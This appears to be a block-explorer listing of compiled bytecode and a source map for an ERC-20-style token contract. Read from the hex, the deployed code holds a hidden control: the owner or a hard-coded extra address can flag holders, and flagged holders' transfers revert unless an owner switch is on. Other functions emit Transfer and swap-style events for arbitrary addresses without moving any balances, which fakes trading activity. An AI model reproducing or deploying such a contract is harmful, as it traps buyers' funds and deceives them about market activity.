a7d5784848281811061091957610918611b7a565b5b905060200201602081019061092e919061194a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516109b49493929190611c99565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610a0857610a07611b7a565b5b9050602002016020810190610a1d919061194a565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a6291906117f3565b60405180910390a38080610a7590611bd8565b9150506108fb565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b1290611add565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3e90611add565b8015610b8b5780601f10610b6057610100808354040283529160200191610b8b565b820191906000526020600020905b815481529060010190602001808311610b6e57829003601f168201915b5050505050905090565b60005b84849050811015610d1957848482818110610bb657610bb5611b7a565b5b9050602002016020810190610bcb919061194a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610c509493929190611cde565b60405180910390a3848482818110610c6b57610c6a611b7a565b5b9050602002016020810190610c80919061194a565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610cfe91906117f3565b60405180910390a38080610d1190611bd8565b915050610b98565b5050505050565b600080610d2b610f53565b90506000610d398286610e24565b905083811015610d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7590611d95565b60405180910390fd5b610d8b8286868403610f5b565b60019250505092915050565b600080610da2610f53565b9050610daf8185856111b0565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e1791906117f3565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610eb36114d2565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610f22576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1990611e27565b60405180910390fd5b610f2b81611550565b50565b610f366114d2565b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc190611eb9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611039576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103090611f4b565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161111791906117f3565b60405180910390a3505050565b60006111308484610e24565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111aa578181101561119c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119390611fb7565b60405180910390fd5b6111a98484848403610f5b565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361121f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121690612049565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361128e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611285906120db565b60405180910390fd5b611299838383611614565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611320576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113179061216d565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561145c5760011515600560009054906101000a900460ff1615151461145b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611452906121b3565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114b991906117f3565b60405180910390a36114cc848484611619565b50505050565b6114da610f53565b73ffffffffffffffffffffffffffffffffffffffff166114f8610ada565b73ffffffffffffffffffffffffffffffffffffffff161461154e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161154590611b5a565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561165857808201518184015260208101905061163d565b60008484015250505050565b6000601f19601f8301169050919050565b60006116808261161e565b61168a8185611629565b935061169a81856020860161163a565b6116a381611664565b840191505092915050565b600060208201905081810360008301526116c88184611675565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611705826116da565b9050919050565b611715816116fa565b811461172057600080fd5b50565b6000813590506117328161170c565b92915050565b6000819050919050565b61174b81611738565b811461175657600080fd5b50565b60008135905061176881611742565b92915050565b60008060408385031215611785576117846116d0565b5b600061179385828601611723565b92505060206117a485828601611759565b9150509250929050565b60008115159050919050565b6117c3816117ae565b82525050565b60006020820190506117de60008301846117ba565b92915050565b6117ed81611738565b82525050565b600060208201905061180860008301846117e4565b92915050565b600080600060608486031215611827576118266116d0565b5b600061183586828701611723565b935050602061184686828701611723565b925050604061185786828701611759565b9150509250925092565b600060ff82169050919050565b61187781611861565b82525050565b6000602082019050611892600083018461186e565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126118bd576118bc611898565b5b8235905067ffffffffffffffff8111156118da576118d961189d565b5b6020830191508360208202830111156118f6576118f56118a2565b5b9250929050565b60008060208385031215611914576119136116d0565b5b600083013567ffffffffffffffff811115611932576119316116d5565b5b61193e858286016118a7565b92509250509250929050565b6000602082840312156119605761195f6116d0565b5b600061196e84828501611723565b91505092915050565b60008060008060608587031215611991576119906116d0565b5b600085013567ffffffffffffffff8111156119af576119ae6116d5565b5b6119bb878288016118a7565b945094505060206119ce87828801611759565b92505060406119df87828801611759565b91505092959194509250565b6119f4816116fa565b82525050565b6000602082019050611a0f60008301846119eb565b92915050565b60008060408385031215611a2c57611a2b6116d0565b5b6000611a3a85828601611723565b9250506020611a4b85828601611723565b9150509250929050565b611a5e816117ae565b8114611a6957600080fd5b50565b600081359050611a7b81611a55565b92915050565b600060208284031215611a9757611a966116d0565b5b6000611aa584828501611a6c565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611af557607f821691505b602082108103611b0857611b07611aae565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b44602083611629565b9150611b4f82611b0e565b602082019050919050565b60006020820190508181036000830152611b7381611b37565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611be382611738565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c1557611c14611ba9565b5b600182019050919050565b6000611c2b82611738565b9150611c3683611738565b9250828201905080821115611c4e57611c4d611ba9565b5b92915050565b6000819050919050565b6000819050919050565b6000611c83611c7e611c7984611c54565b611c5e565b611738565b9050919050565b611c9381611c68565b82525050565b6000608082019050611cae6000830187611c8a565b611cbb60208301866117e4565b611cc860408301856117e4565b611cd56060830184611c8a565b95945050505050565b6000608082019050611cf360008301876117e4565b611d006020830186611c8a565b611d0d6040830185611c8a565b611d1a60608301846117e4565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d7f602583611629565b9150611d8a82611d23565b604082019050919050565b60006020820190508181036000830152611dae81611d72565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611e11602683611629565b9150611e1c82611db5565b604082019050919050565b60006020820190508181036000830152611e4081611e04565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ea3602483611629565b9150611eae82611e47565b604082019050919050565b60006020820190508181036000830152611ed281611e96565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f35602283611629565b9150611f4082611ed9565b604082019050919050565b60006020820190508181036000830152611f6481611f28565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611fa1601d83611629565b9150611fac82611f6b565b602082019050919050565b60006020820190508181036000830152611fd081611f94565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612033602583611629565b915061203e82611fd7565b604082019050919050565b6000602082019050818103600083015261206281612026565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120c5602383611629565b91506120d082612069565b604082019050919050565b600060208201905081810360008301526120f4816120b8565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612157602683611629565b9150612162826120fb565b604082019050919050565b600060208201905081810360008301526121868161214a565b9050919050565b50565b600061219d600083611629565b91506121a88261218d565b600082019050919050565b600060208201905081810360008301526121cc81612190565b905091905056fea26469706673582212209f11438ae723e623be62cf9fd059e2d6bd9ceead8707ecbd6f6bd750bfe226f664736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d5780636a6278421461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c91906116ae565b60405180910390f35b61017f600480360381019061017a919061176e565b6104d9565b60405161018c91906117c9565b60405180910390f35b61019d6104fc565b6040516101aa91906117f3565b60405180910390f35b6101cd60048036038101906101c8919061180e565b610506565b6040516101da91906117c9565b60405180910390f35b6101eb610535565b6040516101f8919061187d565b60405180910390f35b61021b600480360381019061021691906118fd565b61053e565b005b6102376004803603810190610232919061176e565b61076b565b60405161024491906117c9565b60405180910390f35b610267600480360381019061026291906118fd565b6107a2565b005b610283600480360381019061027e919061194a565b61084f565b005b61029f600480360381019061029a919061194a565b61089b565b6040516102ac91906117f3565b60405180910390f35b6102bd6108e4565b005b6102d960048036038101906102d49190611977565b6108f8565b005b6102f560048036038101906102f0919061194a565b610a84565b60405161030291906117c9565b60405180910390f35b610313610ada565b60405161032091906119fa565b60405180910390f35b610331610b03565b60405161033e91906116ae565b60405180910390f35b610361600480360381019061035c9190611977565b610b95565b005b61037d6004803603810190610378919061176e565b610d20565b60405161038a91906117c9565b60405180910390f35b6103ad60048036038101906103a8919061176e565b610d97565b6040516103ba91906117c9565b60405180910390f35b6103dd60048036038101906103d8919061180e565b610dba565b005b6103f960048036038101906103f49190611a15565b610e24565b60405161040691906117f3565b60405180910390f35b6104296004803603810190610424919061194a565b610eab565b005b61044560048036038101906104409190611a81565b610f2e565b005b60606006805461045690611add565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611add565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610f53565b90506104f1818585610f5b565b600191505092915050565b6000600454905090565b600080610511610f53565b905061051e858285611124565b6105298585856111b0565b60019150509392505050565b60006008905090565b610546610f53565b73ffffffffffffffffffffffffffffffffffffffff16610564610ada565b73ffffffffffffffffffffffffffffffffffffffff1614806105cc5750610589610f53565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61060b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060290611b5a565b60405180910390fd5b60005b828290508110156107665760016002600085858581811061063257610631611b7a565b5b9050602002016020810190610647919061194a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106106c2576106c1611b7a565b5b90506020020160208101906106d7919061194a565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561073e86868681811061072457610723611b7a565b5b9050602002016020810190610739919061194a565b61089b565b60405161074b91906117f3565b60405180910390a3808061075e90611bd8565b91505061060e565b505050565b600080610776610f53565b90506107978185856107888589610e24565b6107929190611c20565b610f5b565b600191505092915050565b6107aa6114d2565b60005b8282905081101561084a576000600260008585858181106107d1576107d0611b7a565b5b90506020020160208101906107e6919061194a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061084290611bd8565b9150506107ad565b505050565b6108576114d2565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108ec6114d2565b6108f66000611550565b565b60005b84849050811015610a7d5784848281811061091957610918611b7a565b5b905060200201602081019061092e919061194a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516109b49493929190611c99565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610a0857610a07611b7a565b5b9050602002016020810190610a1d919061194a565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a6291906117f3565b60405180910390a38080610a7590611bd8565b9150506108fb565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b1290611add565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3e90611add565b8015610b8b5780601f10610b6057610100808354040283529160200191610b8b565b820191906000526020600020905b815481529060010190602001808311610b6e57829003601f168201915b5050505050905090565b60005b84849050811015610d1957848482818110610bb657610bb5611b7a565b5b9050602002016020810190610bcb919061194a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610c509493929190611cde565b60405180910390a3848482818110610c6b57610c6a611b7a565b5b9050602002016020810190610c80919061194a565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610cfe91906117f3565b60405180910390a38080610d1190611bd8565b915050610b98565b5050505050565b600080610d2b610f53565b90506000610d398286610e24565b905083811015610d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7590611d95565b60405180910390fd5b610d8b8286868403610f5b565b60019250505092915050565b600080610da2610f53565b9050610daf8185856111b0565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e1791906117f3565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610eb36114d2565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610f22576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1990611e27565b60405180910390fd5b610f2b81611550565b50565b610f366114d2565b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc190611eb9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611039576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103090611f4b565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161111791906117f3565b60405180910390a3505050565b60006111308484610e24565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111aa578181101561119c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119390611fb7565b60405180910390fd5b6111a98484848403610f5b565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361121f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121690612049565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361128e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611285906120db565b60405180910390fd5b611299838383611614565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611320576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113179061216d565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561145c5760011515600560009054906101000a900460ff1615151461145b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611452906121b3565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114b991906117f3565b60405180910390a36114cc848484611619565b50505050565b6114da610f53565b73ffffffffffffffffffffffffffffffffffffffff166114f8610ada565b73ffffffffffffffffffffffffffffffffffffffff161461154e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161154590611b5a565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561165857808201518184015260208101905061163d565b60008484015250505050565b6000601f19601f8301169050919050565b60006116808261161e565b61168a8185611629565b935061169a81856020860161163a565b6116a381611664565b840191505092915050565b600060208201905081810360008301526116c88184611675565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611705826116da565b9050919050565b611715816116fa565b811461172057600080fd5b50565b6000813590506117328161170c565b92915050565b6000819050919050565b61174b81611738565b811461175657600080fd5b50565b60008135905061176881611742565b92915050565b60008060408385031215611785576117846116d0565b5b600061179385828601611723565b92505060206117a485828601611759565b9150509250929050565b60008115159050919050565b6117c3816117ae565b82525050565b60006020820190506117de60008301846117ba565b92915050565b6117ed81611738565b82525050565b600060208201905061180860008301846117e4565b92915050565b600080600060608486031215611827576118266116d0565b5b600061183586828701611723565b935050602061184686828701611723565b925050604061185786828701611759565b9150509250925092565b600060ff82169050919050565b61187781611861565b82525050565b6000602082019050611892600083018461186e565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126118bd576118bc611898565b5b8235905067ffffffffffffffff8111156118da576118d961189d565b5b6020830191508360208202830111156118f6576118f56118a2565b5b9250929050565b60008060208385031215611914576119136116d0565b5b600083013567ffffffffffffffff811115611932576119316116d5565b5b61193e858286016118a7565b92509250509250929050565b6000602082840312156119605761195f6116d0565b5b600061196e84828501611723565b91505092915050565b60008060008060608587031215611991576119906116d0565b5b600085013567ffffffffffffffff8111156119af576119ae6116d5565b5b6119bb878288016118a7565b945094505060206119ce87828801611759565b92505060406119df87828801611759565b91505092959194509250565b6119f4816116fa565b82525050565b6000602082019050611a0f60008301846119eb565b92915050565b60008060408385031215611a2c57611a2b6116d0565b5b6000611a3a85828601611723565b9250506020611a4b85828601611723565b9150509250929050565b611a5e816117ae565b8114611a6957600080fd5b50565b600081359050611a7b81611a55565b92915050565b600060208284031215611a9757611a966116d0565b5b6000611aa584828501611a6c565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611af557607f821691505b602082108103611b0857611b07611aae565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b44602083611629565b9150611b4f82611b0e565b602082019050919050565b60006020820190508181036000830152611b7381611b37565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611be382611738565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c1557611c14611ba9565b5b600182019050919050565b6000611c2b82611738565b9150611c3683611738565b9250828201905080821115611c4e57611c4d611ba9565b5b92915050565b6000819050919050565b6000819050919050565b6000611c83611c7e611c7984611c54565b611c5e565b611738565b9050919050565b611c9381611c68565b82525050565b6000608082019050611cae6000830187611c8a565b611cbb60208301866117e4565b611cc860408301856117e4565b611cd56060830184611c8a565b95945050505050565b6000608082019050611cf360008301876117e4565b611d006020830186611c8a565b611d0d6040830185611c8a565b611d1a60608301846117e4565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d7f602583611629565b9150611d8a82611d23565b604082019050919050565b60006020820190508181036000830152611dae81611d72565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611e11602683611629565b9150611e1c82611db5565b604082019050919050565b60006020820190508181036000830152611e4081611e04565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ea3602483611629565b9150611eae82611e47565b604082019050919050565b60006020820190508181036000830152611ed281611e96565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f35602283611629565b9150611f4082611ed9565b604082019050919050565b60006020820190508181036000830152611f6481611f28565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611fa1601d83611629565b9150611fac82611f6b565b602082019050919050565b60006020820190508181036000830152611fd081611f94565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612033602583611629565b915061203e82611fd7565b604082019050919050565b6000602082019050818103600083015261206281612026565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120c5602383611629565b91506120d082612069565b604082019050919050565b600060208201905081810360008301526120f4816120b8565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612157602683611629565b9150612162826120fb565b604082019050919050565b600060208201905081810360008301526121868161214a565b9050919050565b50565b600061219d600083611629565b91506121a88261218d565b600082019050919050565b600060208201905081810360008301526121cc81612190565b905091905056fea26469706673582212209f11438ae723e623be62cf9fd059e2d6bd9ceead8707ecbd6f6bd750bfe226f664736f6c63430008120033

Deployed Bytecode Sourcemap

21920:154:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9084:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13008:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11777:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13789:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10046:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10146:423;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14493:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11303:206;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8930:84;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11948:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5991:103;;;:::i;:::-;;10876:292;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11517:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5350:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9303:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10577:291;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15234:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12281:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11176:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12537:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6249:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11629:85;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9084:100;9138:13;9171:5;9164:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9084:100;:::o;13008:201::-;13091:4;13108:13;13124:12;:10;:12::i;:::-;13108:28;;13147:32;13156:5;13163:7;13172:6;13147:8;:32::i;:::-;13197:4;13190:11;;;13008:201;;;;:::o;11777:108::-;11838:7;11865:12;;11858:19;;11777:108;:::o;13789:295::-;13920:4;13937:15;13955:12;:10;:12::i;:::-;13937:30